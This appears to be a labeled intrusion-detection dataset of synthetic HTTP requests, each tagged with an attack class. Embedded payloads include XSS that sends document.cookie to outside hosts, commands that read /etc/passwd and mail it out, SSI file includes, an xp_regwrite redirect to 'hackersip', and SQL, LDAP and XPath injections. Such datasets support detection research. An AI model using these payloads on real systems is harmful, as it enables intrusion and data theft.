GET /5jH-RDI/Hikgokntenrnmeref/dEx7PXwY@O/1T_/stiiv8r7eh18ousei/yhtpass/NImquVG2tYyb/8AFq/OJnfromm9/dcr/tQkC7wVr9v24.js?mtrXbcItrg=xp6&owehA6atswmea=fostOtraPthne2u&Ia5Pns1a=6735051&ySwyo=eetjs&34tiksobnei=ewtIkh%40e34n&NgPH=bas%27%5D+++++%7C+P++++%7C+++%2F%2Fuser%5B+++++name%2Ftext%28++%29++%3D%27htfo&nre3cd4a5t8=rxo&nfzeeg=a4Glt&erf=7 HTTP/1.1
Host: www.ntawtsnn7i.de
Connection: close
Accept: application/zip, image/*;q=0.5, image/*
Accept-Charset: shift_jis;q=0.4
Accept-Encoding: compress, identity;q=0.6, deflate
Accept-Language: *;q=0.3
Cache-Control: xstl4Ixs='edy'
Client-ip: 106.123.50.29
Cookie: dsduebfp=70;ERcoiaidaatfnm=34960125
Cookie2: $Version="62"
Date: Fri, 03 Apr 09 12:38:20 UTC
ETag: W/"_ldfV7Hi7T2yZQfxA"
Expect: Odnyhn
From: ge7m@nttgt.gov
If-Modified-Since: Wed, 12 Jan 05 15:57:33 GMT
If-Unmodified-Since: Fri, 23 Nov 07 24:31:31 UTC
If-Match: "bE3HV.B4dO84C3qwh"
If-None-Match: "dNS.WFfdXF@MtTF1Zi"
If-Range: Fri, 30 Oct 09 12:39:13 UTC
Max-Forwards: 0
MIME-Version: 7.2
Pragma: no-cache
Proxy-Authorization: NTLM bWFzZmV0ZWV0N3FlZWl3c2Fsa3NucmNodnNUeVJpcnJldEU5MXU=
Authorization: Basic ZTZhZTo1dXRvZHBh
Range: 87-22
Referer: http://www.2stQ.be/yisse/nnstehF/gdidD.pl
TE: trailers
Trailer: User-Agent
User-Agent: zieey (nVONAEFnf_; 19VCi6RhqM; eFbyXTBSN; 9-8qK6z; sLbDqGG-_W)
UA-CPU: MIPS
UA-Disp: 184,1119,16
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 978x515
Via: HTTP/9.4 76.89.248.87, 6.1 151.248.15.54, HTTP/1.9 www.triNseen.shtml:84338
Transfer-Encoding: compress
Upgrade: wagnk/0.9, aebao/4.3, 7ip/5.1, ttd/1.5, iI1eI/9.7
Warning: 766 www.wbdsi.gif "iiitgc4re" "Thu, 08 May 08 03:06:26 CET"
X-Forwarded-For: 89.218.173.144
X-Serial-Number: 64166045906
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 48896
Start - Id: 39710
class: SSI
GET /eWkwInrb2t36nxz/aeToh7JYjTfo7a6Ut/ysvpeTyrrnoc.php?7nrolrrrwencsi=bZ&sssitTb7=koz9syTHe+bt&oolnkbs=etoistfuey&gd7Fhrhriysf=tWB9w&lteodUnEEO=q%3Be+&sock_stream8DfWIYyhavingPG=%280&wutfsQHoltodea=610&waM0oUz1audj=%3C%21--++%23include++virtual%3D%22%2Fvar%2Flog%2Fhttpd%2Faccess.log%22+--%3E&Sqovcjoyason=75&ndleomfob1r=tvsenrb&seI9Nmnn8=9140961&hNcwa=109&EV9BDt6Y2=59 HTTP/1.1
Host: www.ytaalufswn.uk
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.1
Cache-Control: max-stale
Client-ip: 90.61.188.169
Cookie: aTemenhlf5s=559;tue00tfc7a=oammLD-B7hN_;b0hiw=sLj;ini=ici4oSnaei
Cookie2: $Version="1"
Date: Sat, 27 Sep 08 23:01:31 UTC
ETag: "eQt1lpFUkKACMULNX9"
Expect: bufr=y5wn1
From: en976nr@rtqaia.net
If-Modified-Since: Fri, 22 Aug 08 22:32:42 CET
If-Unmodified-Since: Thu, 28 Sep 06 01:04:01 CET
If-Match: "T9yLUIs4qRNry4USc2"
If-None-Match: *
If-Range: Sun, 29 Jan 06 07:21:27 GMT
Max-Forwards: 15
MIME-Version: 1.4
Pragma: detqeL=scetpb1g
Proxy-Authorization: mE1df gdtrmo=oh1esyls
Authorization: NTLM Z2MzdHNVcnU0bzVoc0RlZWlvVXdldmFYSXNscWxtZXJpcnVy
Range: 61-,98874-5,222224-
Referer: http://www.oRAo.fr/a8oo/aDntv/oorooAu/tOstd.php
TE: deflate;q=0.3,deflate
Trailer: From
User-Agent: Mozilla/6.9 (compatible; MSIE 8.0; Open BSD i386; ayne9; kdBu)
UA-CPU: Sparc
UA-Disp: 3264,053,16
UA-OS: Win98
UA-Color: color8
UA-Pixels: 893x558
Via: HTTP/6.8 www.rvpn.gif, 0.8 www.nmTzet.png, 1.9 32.53.49.166
Transfer-Encoding: fMpdo
Upgrade: effn/5.2, ajnt/0.1
Warning: 414 39.123.241.242 "diuAtlysh" "Sat, 05 May 07 01:06:17 GMT"
X-Forwarded-For: 227.157.179.153
X-Serial-Number: 9911764547155
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39710
Start - Id: 37364
class: LdapInjection
GET /sKZLzopen3.hlocationYatHb/hjstn9nseln8/7bgsound9jlcobmailPinsertj/ogpdh/-J_g6Z.like/sS6HuSN1h.ilily6pu/d7qoXp3XC0mailfwgetas/2f/bcddooiMetchTwl/Lhe1/hooar/m9gZg-WOoo4XGn.swf?3ijartsbaifsd=9362039&haociss=o HTTP/1.0
Host: www.nhsirhaeh.gov:80
Connection: amieNel
Accept: video/*, application/*;q=0.9
Accept-Charset: *;q=0.1
Accept-Encoding: *;q=0.1
Accept-Language: )   (|(displayName=had*)   (name =   had*  )( mail=had*  )
Cache-Control: only-if-cached
Client-ip: 117.148.34.106
Cookie: 47X_I58kpwM= iframeiahcEUnhf-aeodn;rrdJlee=iswn)
Cookie2: $Version="89"
Date: Thu, 31 Aug 06 20:20:07 UTC
ETag: W/"1sErXqkCyucdByw"
Expect: osmxe2=dnrEhje;ehUcdt
From: zhwiybw@hehuAUa89a.fr
If-Modified-Since: Sun, 06 Dec 09 08:28:34 UTC
If-Unmodified-Since: Fri, 20 Feb 04 24:08:25 GMT
If-Match: *
If-None-Match: *
If-Range: Mon, 22 Oct 07 03:12:31 GMT
Max-Forwards: 6
MIME-Version: 0.9
Pragma: tatf='ten'
Proxy-Authorization: Basic b3NuZXI6Z0FvdWU=
Authorization: Digest nc=222E6fF1
Range: 257723-74,-66
Referer: http://tmPhmR.fr/suige/ikoO8sq/i3cfrrr/eahtTgcl/rr8semg.swf
TE: trailers,deflate,gzip;q=0.9
Trailer: Accept-Language
User-Agent: Mozilla/0.5 (Windows; U; Windows NT 7.3; ke-no; rv:9.4.0) Gecko/83312624
UA-CPU: MIPS
UA-Disp: 929,760,16
UA-OS: Win95
UA-Color: color32
UA-Pixels: 5121x090
Via: zc3i/6.8 www.eeeDpg.png, 8.1 233.174.254.51
Transfer-Encoding: emee
Upgrade: oie/1.4, esndns/6.8, eengr0/5.0, e7la1/2.5
Warning: 670 195.185.136.48 "lepotnTerel" 
X-Forwarded-For: 183.74.149.62
X-Serial-Number: 30089699
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 37364
Start - Id: 35673
class: XPathInjection
GET /e5tj8XjP/ucQMCMW/gc7atpeArKeeh/atacETrbEsraepewnneE/tfol16ierl/57tZKmOc/na1nzG/ehavingAY5oprocessing-instructionN.tiff?uentr=35&adsntepyroln=o-6KpwB&@bP-7YaaIp=2+po&exbetupn9sp=+m%26x%5BSc9gieDx%3B&_QfZ-gMx=8&zwMH=hkaio&rWWtUl-7copya=R+s&eemaookaMooapo=996&4tjp=wdoico0r%27+++or++++1%3C+++++arb%2Feie%2Fy0%2Fchild%3A%3Atext%28%29%5Bposition%28%29%3D267%5D+++++or++++%27ate2ssu%27++++%3D++%27&IyMEf=dni%2Beunionk%28 HTTP/1.1
Host: 223.236.209.242:3701
Connection: keep-alive
Accept: application/zip;q=0.7, audio/x-wav
Accept-Charset: *
Accept-Encoding: *;q=0.0
Accept-Language: oEteoi-a, uurnsrEm-Fu0lnsy, 6boe-d11uet;q=0.5, 6oBmi-0cy0Evgx;q=0.6, hdAe3xht-ua
Cache-Control: max-stale
Client-ip: 68.97.141.43
Cookie: ah98=43;IyEFn=as
Cookie2: $Version="890"
Date: Sat, 15 Sep 07 23:26:02 CET
ETag: "Llo6Q0Dtf73F-LBFZWsG"
Expect: e8c6tipe
From: tgaZ6rhn@dneNoaa.uk
If-Modified-Since: Thu, 08 Oct 09 16:38:14 UTC
If-Unmodified-Since: Mon, 27 Apr 09 16:38:08 GMT
If-Match: "-OtePnzfOtfkoju"
If-None-Match: "DXr@xI@B4b0@Xmt"
If-Range: "1947u5Zn0GiwsfB"
Max-Forwards: 0084
MIME-Version: 5.4
Pragma: no-cache
Proxy-Authorization: Digest username="sudmt"
Authorization: Digest qop=auth
Range: -5103
Referer: http://www.gednsoi.biz/xrtpsths/amSen/5netj/iowrz6v.exe
TE: chunked,trailers,deflate;q=0.4
Trailer: From
User-Agent: thtdaea/2.8.2.9
UA-CPU: x86
UA-Disp: 466,505,8
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 2667x788
Via: 8.1 188.92.150.124, 2.5 81.54.134.140
Transfer-Encoding: compress
Upgrade: pnarot/3.1, 7tgym/1.5
Warning: 250 95.244.16.100 "anwrZ" 
X-Forwarded-For: 214.86.27.10
X-Serial-Number: 24734
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 35673
Start - Id: 47754
class: XSS
GET /scnknZHBCy3kdvWnK/amo@mvEsVL5dnwD1WDLt/aq5cgOMJPyQYFuR_P1R2/fwZupFxuf8/lTssrmEimelAti/aduSMkc3/Nmn0aP4rcpaccess_loguJ/LZrws8RsQU.mspx?ttson=%3Cinput+++type++%3D++++%22++++image++%22+++dynsrc++%3D++++%22++++javascript%3A%5Bwindow.open%28%27http%3A%2F%2F128.141.7.252%2Felerar.pl%27%2Bdocument.cookie%29%3B%5D+%22%3E&seh2ne=sn&niiiNcauplthnY=o&lnjie=g_QKwOLJn.q&bnacltmot9eraer=qyraa72hettbpd&llen3isitr=neh&ared7=x%25u%5Cni&eobnmnrh85eene=otr&stni6mlsde=aa4o2luni8ya&M1@KmSSls=Les+e12laV5oo&ororcsnsnwds=4hthsMDr&ade=u&tsrtoei4T=53001148 HTTP/1.1
Host: 105.63.221.184
Connection: close
Accept: */*
Accept-Charset: *;q=0.5
Accept-Encoding: 
Accept-Language: *
Cache-Control: osRteeuc=nJdcO
Client-ip: 244.205.136.111
Cookie: eceyee=9079492328;os6=nNC._9Cu1hZG;l3ysafmbX=rnpcoraus
Cookie2: $Version="5"
Date: Thu, 01 Apr 04 08:50:13 GMT
ETag: W/"sPg8XQuBd1fbCE95qfIX"
Expect: 100-continue
From: timd@onRl.biz
If-Modified-Since: Tue, 29 Jun 04 16:36:17 UTC
If-Unmodified-Since: Wed, 27 Jun 07 14:21:56 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 4
MIME-Version: 7.7
Pragma: no-cache
Proxy-Authorization: Basic b3Q3YXlzZm06ZHZjaG5m
Authorization: egars leinEo=deslruO3
Range: 20-31,7-1,-6
Referer: http://Tln2ebdL.net/eeteas/rizk/Rc8sui/lrso/weio.tar.gz
TE: gzip
Trailer: Date
User-Agent: Mozilla/9.6 (compatible; 8le7eneo; Windows NT; p5aitra3; jrennrq)
UA-CPU: 68000
UA-Disp: 746,0945,16
UA-OS: Win98
UA-Color: color32
UA-Pixels: 561x6609
Via: wlfe/1.9 www.cqtJnru.js, 8.7 74.54.253.242, 4.0 95.121.132.173
Transfer-Encoding: oett
Upgrade: sji/4.0, asq/5.9, arzh/5.3
Warning: 123 216.249.112.222 "zvuintlrwsyt" 
X-Forwarded-For: 198.120.124.208
X-Serial-Number: 276686025010368584
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47754
Start - Id: 42958
class: OsCommanding
GET /pp6eealitejrsuazrh/og5qTGO3hVkLHW@MiTN6/eGjC/3qhl8Ouk9Eegs/stdinhyF3rr.f/k0eietaeosefe/fromfq/1pqqSjPQhRMZpmsDTZ/uLt7txUEhiW6y1/x2Qa/60D3gg/rx.htm? HTTP/1.0
Host: www.xk9rsoE.cz
Connection: close
Accept: audio/x-wav, audio/x-wav, audio/x-wav
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *;q=0.8
Cache-Control: min-fresh=912
Client-ip: 165.228.47.160
Cookie: ris=|   cat    /etc/passwd    |
Cookie2: $Version="2"
Date: Wed, 18 Jul 07 02:54:16 UTC
ETag: W/"Mb12B1vUmf.zrtBA_KA"
Expect: iovuh=bootfc
From: eefh@5eodhRlM.cz
If-Modified-Since: Tue, 06 Oct 09 02:32:47 UTC
If-Unmodified-Since: Wed, 17 May 06 02:09:17 GMT
If-Match: ".UuedeS91FrdnyO"
If-None-Match: "orTyn2kKpeCXorxo02I"
If-Range: Mon, 10 May 04 01:05:10 UTC
Max-Forwards: 64
MIME-Version: 4.6
Pragma: ihbode=1
Proxy-Authorization: NTLM aGxhbm90c2ZtbElhdHNlb2RJbnNIbnNXYTBuc3lramVxbmN1dWlydHIx
Authorization: csnims awa2ee=njszre
Range: 897591-3673
Referer: http://www.sytaH.fr/heRues.dll
TE: trailers
Trailer: Transfer-Encoding
User-Agent: utRtcn
UA-Disp: 0867,9888,32
UA-OS: FreeBSD
UA-Color: color8
Via: 9.4 www.qrsZ.css, 9.6 www.donqed.png
Transfer-Encoding: deflate
Upgrade: ewJ/9.0
Warning: 369 www.lroioecl.jpeg "ra1tNci" 
X-Forwarded-For: 101.85.128.32
X-Serial-Number: 1010994054
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42958
Start - Id: 43479
class: OsCommanding
GET /fRp/0tcaleiee/nJBps/sE5XRHRxAm/jfCIOjrpR9KAox5ouV/O0xnnBySlqheI/mhleqspahs.mdb?75hejsndizod=oops+%3B+cat+++%2Fetc%2Fpasswd+%7C+++mail+++your%40se5e.com HTTP/1.1
Host: 142.209.125.25:80
Connection: qthhRst
Accept: image/*
Accept-Charset: *;q=0.5
Accept-Encoding: compress
Accept-Language: *
Cache-Control: max-stale
Client-ip: 4.171.198.232
Cookie: nymxrq0simr5a9s=yNp;gbpEod=956649;mFra8eDinboe40o=osi;nrgom8s=11810;ahn06ene=hnny
Cookie2: $Version="876"
Date: Mon, 02 Aug 04 17:54:42 GMT
ETag: W/"@K4eB7R86idDJqDsd"
Expect: 100-continue
From: 0rhyil@a9lhonata.it
If-Modified-Since: Sun, 18 Feb 07 05:54:32 CET
If-Unmodified-Since: Tue, 27 Mar 07 19:37:43 CET
If-Match: "eo79AzrktuKfOfznf4hm"
If-None-Match: *
If-Range: "3_.SFcJe86PnCoW"
Max-Forwards: 466
MIME-Version: 9.2
Pragma: no-cache
Proxy-Authorization: Digest username="tn0h3pl"
Authorization: Digest nonce
Referer: http://www.tlvce.biz/sehrndnh/ruajet/ynaiscim.rar
TE: gzip,chunked;q=0.4
Trailer: Range
User-Agent: seecotiso (dNlEeWo1; iKRVYl; aewfMoO@fl; nu6@pZA; lP.alA)
UA-CPU: Sparc
UA-Disp: 6546,0956,32
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 2941x889
Via: 6.2 www.g1nTrsh.gif, FTP/8.7 www.dHa6Ans.shtml, 6.4 www.iuyt.shtml
Transfer-Encoding: deflate
Upgrade: lrtrnn/3.5
Warning: 847 www.0te1.css "ctnpcrbrylblaepn" "Wed, 02 Aug 06 09:38:06 UTC"
X-Forwarded-For: 137.226.116.122
X-Serial-Number: 5600215
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43479
Start - Id: 37771
class: LdapInjection
GET /oteJastjellzio6orhmt/rgZD7AzaQD0bL/h_qTN4Sk1/lz/qVn_oCU/sL.js?9EtTYHyMBEK7=f4siom&Cvd0anN3nRo=11611&issoyvalsCTntn=%22%29%28targetfilter%3D%28o%3DNetscapeRoot%29%29 HTTP/1.0
Host: www.tonolndrtm.ch
Connection: edoy5vm2
Accept: application/postscript;q=0.6
Accept-Charset: *;q=0.8
Accept-Encoding: 
Accept-Language: *;q=0.1
Cache-Control: eSrta='xtse9en'
Client-ip: 135.122.50.19
Cookie: 8tdes12si=ae~
Cookie2: $Version="81"
Date: Fri, 02 Dec 05 04:10:25 CET
ETag: W/"RYy4X6t.spo28jV5m8f"
Expect: 100-continue
From: rersi@ehis.de
If-Modified-Since: Wed, 16 Feb 05 09:51:41 UTC
If-Unmodified-Since: Sat, 21 Jan 06 02:35:01 CET
If-Match: *
If-None-Match: *
If-Range: Sun, 06 Aug 06 17:13:24 CET
Max-Forwards: 8684
MIME-Version: 0.6
Pragma: no-cache
Proxy-Authorization: Basic MzRvbG86dGVzU3hhbmQ=
Authorization: Digest opaque="maud"
Range: 00-,840-774
Referer: http://eyi2ewt.ch/ieaCaNoh.gif
TE: deflate,trailers
Trailer: TE
User-Agent: yTmqpvOsK http://www.ylATh.ch
UA-CPU: x86
UA-Disp: 3289,383,8
UA-OS: Win98
UA-Color: color8
UA-Pixels: 807x162
Via: 7.8 250.178.230.69:6, FTP/0.0 47.132.1.52
Transfer-Encoding: identity
Upgrade: Ebsle/5.6, dvNtn/8.8, on3/2.1, sae/8.5
Warning: 938 145.133.83.75 "ehdr1rgj" 
X-Forwarded-For: 232.43.71.116
X-Serial-Number: 7486160267274211008
----: ----------------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 37771
Start - Id: 48089
class: XSS
GET /ayr2reergbpieli/atb1k/ie8.shnQGl1WKAAvLJ/gGletcsQ.php4?lFy=nckihq+Sqia&nnra=aoiNe6nwtteultD3t&9@3H=ef&leeap6r5zh=esd&sRVoB=%3Cdiv++onmouseover%3D++%22++++%5Bdocument.location.replace++++%28%27http%3A%2F%2Fwww.tronarni.com%2Fcgi-bin%2Flidesiaras.cgi%27%2Bdocument.cookie%29%3B%5D+++++%22++++%3E&lib3-Q=0345679&trEeeccc=5LJx&casgtiiXadhg=sampsv&lU_Q=s8wice0nhop%3A&zli=6855245&aenp=305&it4=0524&e6nlahoossh=mto HTTP/1.1
Host: 25.142.24.155
Connection: keep-alive
Accept: */*
Accept-Charset: x-mac-turkish;q=0.1, utf-7;q=0.9
Accept-Encoding: 
Accept-Language: o-plmSnpcw;q=0.0, innd9u-td
Cache-Control: max-age=355
Client-ip: 208.200.242.33
Cookie: m0=1s ;V1wDS=sAeooszs;oleoersnra=wnqo5s3lu
Cookie2: $Version="484"
Date: Fri, 02 Oct 09 14:07:09 GMT
ETag: W/"f2Ef.UQP5@VK81BRTV"
Expect: 100-continue
From: pr43lq@7remye.cz
If-Modified-Since: Sat, 04 Feb 06 11:22:32 UTC
If-Unmodified-Since: Tue, 15 Nov 05 13:40:12 CET
If-Match: *
If-None-Match: *
If-Range: "pycaZVLhg9JCVweRmNW"
Max-Forwards: 4797
MIME-Version: 2.8
Pragma: 8eei8s=PEcrap
Proxy-Authorization: Basic bGVpbnJsaTpvb2lDbA==
Authorization: Basic ZHR0aTppb2hh
Range: -179295,540225-63
Referer: /pnkaisuo.exe
TE: trailers,trailers
Trailer: Max-Forwards
User-Agent: herYL8Xf3 http://www.bnboAnf.cz
UA-CPU: Sparc
UA-Disp: 367,260,16
UA-OS: Win95
UA-Pixels: 6001x2247
Via: HTTP/0.9 97.240.1.246, 0.6 67.131.86.140, njhoOo/4.4 173.241.197.147:504
Transfer-Encoding: deflate
Upgrade: latA/6.2, lyernh/8.8, vU0s/9.0, esnis/7.5
Warning: 356 www.tzeinr.css "til8sinolr" 
X-Forwarded-For: 69.186.228.89
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48089
Start - Id: 40406
class: SSI
POST /8Ll8dehws0gNlaqno/eCwetif1uTizEe9cpo/8chfsy6erjinSGdn6lt2/iMrmwgsttfdsu6enme/7orxcpasswdI/ioknsinitpurDozCihs/6Ssock_streamT@lT1b6HWX.asp? HTTP/1.1
Content-Length: 265
Content-Language: aaar,lMi1l25
Content-Encoding: identity
Content-Location: http://www.uAldhrg.net/dixo/n8fad/tahl/Ssotnl.php3
Content-MD5: bWRhdGVoYnRPaGV0aWFmdA==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 07 Dec 07 13:23:27 UTC
Last-Modified: Fri, 06 Feb 04 18:26:32 CET
Host: 175.23.40.64:308
Connection: close
Accept: audio/*;q=0.0, video/mpeg
Accept-Charset: *;q=0.3
Accept-Encoding: 
Accept-Language: *;q=0.8
Cache-Control: max-stale
Client-ip: 16.69.2.56
Cookie: ee0eIm=rbAiieeatelnet'l|bl
Cookie2: $Version="13"
Date: Tue, 13 Mar 07 13:03:52 GMT
ETag: "6VoYCsLVuGsywbSj0"
Expect: ehahe
From: nvecwD@airnsvo7rs.com
If-Modified-Since: Sat, 17 May 08 01:15:41 CET
If-Unmodified-Since: Mon, 19 Sep 05 06:41:24 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 0217
MIME-Version: 9.4
Pragma: no-cache
Proxy-Authorization: l4te9v tifnO=sIwmcnTg
Authorization: UaneH hnznx=yoh6
Referer: /nieaaht/leec/t5uhes/aeaeo/fmfSusrf.jpg
TE: deflate,trailers,chunked
Trailer: If-Unmodified-Since
User-Agent: Mozilla/8.7 (X11; U; Open BSD i586 8.7; BC-ir; rv:4.4.6) Gecko/01028251
UA-CPU: Sparc
UA-Pixels: 5480x145
Via: HTTP/9.2 32.238.160.110, 6.6 177.96.113.196
Transfer-Encoding: compress
Upgrade: ereyo/1.5
Warning: 410 www.hett9f.tiff "rlxshbn4vdigo" 
X-Forwarded-For: 55.196.49.158
X-Serial-Number: 945253
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

pitomO4aeini=1n rE d&ti8=8889031&bkhmt7H6omr=6&Se6eardrtbcE=07&srueNnaettey=slvl&9Hnull4Quw1MK=<!-- #include virtual="c:\winnt\system.ini"   -->&t0rbj=eh>rcpiQsylF Lf y5&zn2Xi6h5pd=0e&e_xUT=t2HB&nvltosn=tr&eecNHeer=37246092&qe20tseabp=htc0plns

End - Id: 40406
Start - Id: 41671
class: SqlInjection
GET /0Iikp4/eWjTsx1Z/sxtPh15fNGjwDg/id.png?u1kb4iha=iqit%5D&wKgS0Oh7=OR+%27uldynrSl%27+++++BETWEEN++++%27R%27+++++AND+++++%27T%27&yi=3346913034&cpjterelasN=de9U2 HTTP/1.0
Host: www.fmd7oalrd.biz:80
Connection: keep-alive
Accept: application/*;q=0.7, video/mpeg, text/*
Accept-Charset: cp-950;q=0.3, cp-936
Accept-Encoding: 
Accept-Language: sart-a2ly, otabaeet-xtco;q=0.2
Cache-Control: max-stale
Client-ip: 5.33.223.172
Cookie: lhkssurnnCrx=s3e%;aiynm=Lnab~ein%4o; cnrobjectdndt;aSfymtBgnMag=ldcnt0wget~>;srg]mte-c
Cookie2: $Version="5"
Date: Sun, 03 Jun 07 05:52:06 CET
ETag: "9etS4jTU1lIUOtjyf_"
Expect: 7huauig
From: maohii@yrratfrp.uk
If-Modified-Since: Fri, 11 Jun 04 13:21:13 GMT
If-Unmodified-Since: Sun, 27 Jun 04 17:08:53 GMT
If-Match: *
If-None-Match: "iq7M18atiEy_-Mx"
If-Range: "_GAzh@j7to8Lv3f9"
Max-Forwards: 5385
MIME-Version: 1.5
Pragma: rlitR9S=noasnay
Proxy-Authorization: ne1cn l3hIf=adoal
Authorization: Basic bnhpRWM6bnNhcnNzbA==
Range: -91,787-299778
Referer: http://www.ustZfn.it/gath/uwedvn/hxles/4Igtt/a5oel.wav
TE: trailers
Trailer: Host
User-Agent: rLJLq2W01H http://www.oeAi8S.fr
UA-CPU: MIPS
UA-Disp: 2834,2406,8
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 232x3893
Via: FTP/1.7 35.198.25.46, FTP/4.6 www.pdicdn.html:9
Transfer-Encoding: identity
Upgrade: Exe2/5.7, all/8.8, cei1I/8.8, syzked/1.5
Warning: 530 32.109.118.103 "hOGeuun3sa018i" 
X-Forwarded-For: 46.66.131.26
X-Serial-Number: 611965021882313
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41671
Start - Id: 36405
class: OsCommanding
GET /tsAZL2x9Pm1njyLx/o3nDIL9K.js?aa=9318043&vzndceZIcmqee1=eanurwgweodxt3a&WxmlOAXNhpS=r%3A+uhSidautoexecne%5B8s&nsl6ooesy=7-1r&ThtaccesxOlibtM=exec++xp_regwrite+%27HKEY_LOCAL_MACHINE%27%2C%27SOFTWARE%5CMicrosoft%5CMSSQLServer%5CClient%5CConnectTo%27%2C%27nualac%27%2C%27REG_SZ%27%2C%27DBMSSOCN%2Chackersip%2C80%27&reEo7tLocjeE0ce=97 HTTP/1.0
Host: www.4EaIu4e.ch:4
Connection: 5fzp
Accept: */*
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *;q=0.0
Cache-Control: min-fresh=015
Client-ip: 223.164.71.64
Cookie: em=oe8fo3bioednttie;Eiobliuta=iePtqi;usenrxr=45353475
Date: Sun, 14 Jan 07 13:52:47 CET
ETag: "hOr.gXCisBKC7v6cJQ"
If-Modified-Since: Wed, 15 Nov 06 18:12:26 GMT
If-Match: *
If-None-Match: *
If-Range: Sun, 13 May 07 24:50:40 GMT
Referer: /oioSiiaO/NimU.cgi
TE: trailers,deflate
User-Agent: oeNl (41YDRT; eKNOFN; nR0KavPp; koe3gczYH; yia0eu.)
UA-CPU: PowerPC
Via: LYb4ae/0.7 73.2.170.101, HTTP/4.2 49.95.165.25
X-Serial-Number: 3132284615
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36405
Start - Id: 49688
class: XPathInjection
GET /fga980eNI/aean7adchiniU/4togn/atriozuJwMq/siT/Fhv.asmx?uWG8=%28i++%3C++count%28st%2Fchild%3A%3Atext%28%29%29++++and++j+++++%3C++count%28m3%2Fchild%3A%3Acomment%28%29%29+++++and+k+++%3C+count%28daenz%2Fchild%3A%3A*%29++%29&Ml.bWv12Gt=vrr%3BrOrlp%3EmetaeolihAwh&thy=wxtmejEdheugeeee&vwindow.openF-SJMQsock_streamLA0=52145&tanntebrte=401232 HTTP/1.0
Host: 12.89.249.115
Connection: keep-alive
Accept: */*;q=0.1
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *;q=0.6
Cache-Control: only-if-cached
Client-ip: 31.16.198.186
Cookie: ldeq0h=ysLA6bB3CnA;uw=sN2wA;q6ejseedtq10s=3594552493;oJniD4VuH=slhasIansmrRted1
Cookie2: $Version="176"
Date: Fri, 02 Apr 10 01:30:26 UTC
ETag: W/"rxcndMh1TvLBsYH"
Expect: Aahhoh
From: h9cdqge@khpde.com
If-Modified-Since: Tue, 24 Jul 07 12:56:21 UTC
If-Unmodified-Since: Wed, 22 Nov 06 16:25:00 CET
If-Match: *
If-None-Match: ".rzd6rqmI.@wp3BRxDX"
If-Range: *
Max-Forwards: 4117
MIME-Version: 7.7
Pragma: no-cache
Proxy-Authorization: NTLM b2RuZWV0bGVubm5nb2huU3diYWZibW9uc3BlRHp2dG1jYXdiZWNsM0FlNXM=
Authorization: Basic amFucm86YWVOdW9l
Range: -394122
Referer: /onhccEb/5lvihny9.php4
TE: trailers,chunked,trailers
Trailer: Range
User-Agent: Mozilla/8.3 (X11; U; Open BSD i586 1.2; ei-xr; rv:3.9.6) Gecko/26629024
UA-CPU: StrongARM
UA-Disp: 764,428,32
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 5244x685
Via: HTTP/6.2 165.5.134.195, hhe/3.6 www.Yaein5.htm:9827, 9.7 www.eslld2F6.png
Transfer-Encoding: compress
Upgrade: reeei/0.0, w2wde/2.4, e58a/5.6
Warning: 928 www.sea4hf7.png:6529 "guetn6bIulNebhuhnEd" "Fri, 08 Apr 05 24:10:56 UTC"
X-Forwarded-For: 76.177.20.101
X-Serial-Number: 7269529706090781
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49688
Start - Id: 37731
class: LdapInjection
GET /r4qn2ZT1Jn9Qkh5/sipp2@.Yf3i/zd7IYoR.msf?6bkEh=613698&hrr7w9rsfro=tf&keserbMhmi=texz&gaeql=9798&tcmc=hjj6ho&cnhanhtpb=%29+%28++++%7C%28displayName%3Dhad*%29%28name++++%3Dhad*%29%28+mail%3Dhad*++++%29&erhgins=nel%2Fa&YEnYMV47JRyD=Eo3 HTTP/1.0
Host: www.clvuiaer.biz
Connection: keep-alive
Accept: audio/x-wav, text/html, video/quicktime
Accept-Charset: *
Accept-Encoding: 
Accept-Language: s-e, cciyi-n1g;q=0.0, tewrmr8-ca4, ttb-ba2, hdnt-oYsePmrq;q=0.9
Cache-Control: no-cache
Client-ip: 7.203.36.66
Cookie: oi7sepSl=window.open~nd;ecywwset=23
Cookie2: $Version="8"
Date: Fri, 12 Jan 07 18:40:41 GMT
ETag: "5II8sc8ciUVdrRtHqjP"
Expect: fniL
From: Iiydrs@AboeNOsxe.biz
If-Modified-Since: Fri, 10 Mar 06 15:12:26 CET
If-Unmodified-Since: Mon, 08 Oct 07 08:48:58 CET
If-Match: *
If-None-Match: *
If-Range: Sat, 22 Apr 06 05:47:16 CET
Max-Forwards: 97
Pragma: no-cache
Authorization: NTLM N1hrbXBhbGEyZ2VhN1R0aW5lOTZub3ZjZWVuaXYwZWlsR2k=
Referer: http://www.medk.cz/iesdxes9/yieoeod/Gnso8em/rdheheit.dll
Trailer: From
